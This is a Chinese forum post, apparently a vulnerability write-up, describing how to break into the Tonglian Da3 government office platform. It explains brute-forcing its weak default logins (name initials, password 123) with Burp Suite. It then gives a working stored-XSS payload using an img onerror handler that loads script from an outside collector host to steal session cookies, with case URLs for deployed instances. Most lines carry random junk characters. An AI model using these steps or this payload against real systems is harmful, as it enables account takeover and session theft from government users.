, O# ]9 L% J, h" B' v4 u8 `
; p* T, g: E) j7 r1 _ 同联Da3协同办公平台后台通用储存型xss漏洞% E% H, [) y) L# Z
1 f) k* {& G: @, ?
1 a7 ?6 R- X% z7 K( `5 d8 P 平台简介:
7 O( ~+ v( g# H+ U& g! K K
$ `0 q. B. y7 U& J' ]& K
; B+ y- | y/ _: i, J0 e# R
! ?* [3 c* I* l
! O6 H* t, E. x A5 O
6 m; z: J# @9 ~0 l' z Q1 Q2 L 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
1 v2 |7 c c# ^7 a
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
' b( S& F- T: [6 S; Z
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
4 x" I7 H9 H. w4 L; V& }0 ?
! V) a/ d- C* V9 a3 n6 ~) t7 G
; v6 L: _/ R2 A$ i4 \
0 H2 A8 u) }# R' C6 u; F7 n
+ S# q" y/ o8 M+ M1 r7 A, o0 P
5 z& d9 B4 G- k) x% |' \ 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
' Q+ j% L3 Y& q" L
) B, z$ n3 G# p ( Z' g2 ?* g9 k( U# Y" U9 A+ u. y) v7 t0 ]
5 P; Q" a4 t/ B8 D Z! O* o0 e; Q
% o# N8 t, V _0 d8 \4 @. z% i
) |7 I8 W' [9 K3 }) t
http://1.1.1.1:7197/cap-aco/#(案例2-)
! E0 D" q. ?9 t) y; Y" z9 p
7 i5 ?( W$ Y4 S0 c) s. M4 U6 |4 d # o$ F/ x. S5 q7 |% q
http://www.XXOO.com (案例1-官网网站)
1 |/ \2 c! ]' B" I1 U/ k6 N
$ r4 f# r$ t4 p q( L; ]$ [
' R0 h1 N" x8 m8 r( j+ B 漏洞详情:' x; `) ?3 c) d* U/ `7 K( O
, A2 }: N0 | ]- ?
$ ]! J" P" G, V' w1 Z; @ 案例一、
- Y" s7 x8 U& H: h' K9 \/ V% Y
6 @ D* b2 n! o7 e5 e3 O* M k
/ W4 d: z+ l' v; ?# n3 Y 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
3 \7 i6 E8 a9 h
# v: }7 f" C$ \7 j( l
* r9 R1 k) l7 U' V 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:/ z; L5 k% d- Y$ C$ r: q
) @; N0 p" K; I% H1 O$ T
0 _; c7 E8 _) B# M
' C( O2 K c7 b7 u( N
" Y8 M: I" f- m6 b) | 5 p" `3 O) ?, O( J1 L' R# V" N
' y& p" f& J% K5 j. p* ~0 Q
' o. M# T# C. d/ {5 X0 N1 Q% k& W 9 L; L% h |8 r- M
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ^ b2 ]: y5 D) M' \8 D# Y+ `! |
0 I x! y. A0 b* I4 p! m
' f: ^% Q* \) I1 S3 d+ c4 e
" n; n# q$ Q9 |, F' q
X2 g. E) Y' ]
9 S; f" p; _6 Y# q z f5 i8 E0 o 
$ c- k1 x6 i' p) Y: O* o2 L! H' a
& q6 l. u, Q, I# G8 B( e% b " Z3 M/ q, p; M0 M, @
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 # _' k& \+ H2 B/ g7 o8 I# D- G/ y( S
8 n6 x: x3 p/ r3 F5 D : K- N, a, j! K$ o" B W9 Q
+ ~( R" T- n/ \& c
" ?1 N% f' M9 g8 ?% v, y
8 g/ ~; p8 w$ i" \ n+ H
<img src=x+ r7 R+ T" m! A5 ?+ ?0 M
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
/ g- e- w$ L& l2 ^ A
. I$ u! L8 B3 E/ b, C
n) y2 {' q* q3 E% t+ }% Q4 g 
0 a: V! b3 e4 C+ }6 a
4 ~2 I( A% {% M6 I
8 x; U7 d1 T2 K# {: E2 U
然后发送,接收cookie如图: ! G f0 y1 i3 p/ A% R
( x1 R* w3 \4 \3 ^
0 K& P) i8 x0 Z) i ' m* W8 h9 ~' e! v1 l# {+ j% g
L4 m5 x% | O9 W/ H% L : `5 N+ d5 W# q& t+ \) z
0 Q6 t" I6 u- e
8 {% \0 m/ p( e) s
) K4 {9 H7 h3 ?, s! ?( y' l" `3 c
7 M; \. I, O- |+ R3 M
7 M% o( |; b3 C7 U! ^& G
0 D# a. X N: A. W6 R 7 Q; l$ }+ L! P' `+ v
* s8 U# S5 h9 p3 @7 X% m9 `
( s. T# k3 f$ r5 E( c( n 
2 N( O4 ?7 ~! a" f
$ _, q! f- C, B" d3 A/ f g
+ Q9 o. D* |! \/ G8 Q" y 
" v+ u& C! t X
$ W, p5 |( [, w0 ], S
) h$ x8 H; V1 r9 `2 j
8 e/ Z" _( U* _# d( c- ~$ |3 F1 t
% `# I% R0 `9 F( R! n
4 ^$ z7 M8 M* e- V& R- n8 Q 案例2、 & ~7 f* Z3 O% Y4 y& u
1 D, I5 t; z- Z2 j6 x & ~' P, G7 Z- `9 h5 D! E, `
前面步骤都一样,下面看效果图: ' N/ y& s. X- Q1 R, h8 e; \ C
6 t# ]& @* r, i) D- r7 @
; ?' k! [, }. S* Q5 V; X) e
' y: P+ ^: {) i0 d' n# I
4 O% ] e( z! R0 j5 l* @1 q 0 o+ V' W" |8 b
5 e5 A& x) x+ ?5 \. Z, m. K
! U3 j3 Q( D; O7 \0 c: N4 K* k$ { 7 n8 w* J! X4 B! [* T: q
7 F L: T( v8 G8 K& k
8 N; V3 ~2 A3 V. z7 l
5 t; _9 F% J4 v
& \9 L6 |# d! p9 ^5 C2 U2 u
+ z _: T9 z0 v0 Y7 a9 F
9 P, w' c2 A& R/ ^" C+ m" u' q
7 R( d& I) s. f9 S
( z6 q4 g4 x7 }! f/ s5 z) E* H
- w! {, E1 P- a7 t1 B
7 h2 [2 N/ D% i
( ^2 b+ i& @8 _. |" [, _
3 B4 I* P& x6 {' U0 V
* h6 E3 I( H! L. W- d& ~
6 O- @. r2 t9 S4 C & p6 l: E% Q) a5 F/ n% |$ o
& y) I$ e9 B |; r
) J$ K0 P! \! e5 H( W# }+ ?
' y D0 c! w D# m/ Q6 d6 Y
! u# ], [4 s A- U
" f2 ^# s; ]+ k G' Y- c
发表于 2018-10-20 20:14:15
收藏
支持
反对